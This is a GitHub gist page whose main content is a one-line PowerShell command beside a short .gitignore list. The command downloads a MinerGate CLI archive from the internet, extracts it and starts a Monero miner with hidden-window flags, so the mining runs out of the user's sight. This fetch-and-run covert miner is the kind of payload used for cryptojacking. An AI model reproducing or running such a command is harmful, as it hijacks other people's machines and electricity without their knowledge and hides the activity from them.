Skip to content

Instantly share code, notes, and snippets.

@MatteoGauthier
Last active May 5, 2019 10:13
Show Gist options
  • Save MatteoGauthier/cae376253a0c1003e52119cbce00230c to your computer and use it in GitHub Desktop.
Save MatteoGauthier/cae376253a0c1003e52119cbce00230c to your computer and use it in GitHub Desktop.
a/
*.zip
.gitignore
(New-Object System.Net.WebClient).DownloadFile('https://minergate.com/download/xfast-win-cli', 'a.zip');Expand-Archive a.zip -DestinationPath a;PowerShell.exe -windowstyle hidden {Start-Process a\minergate-cli.exe '-u [email protected] --xmr -g --no-cpu' -WindowStyle Hidden}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment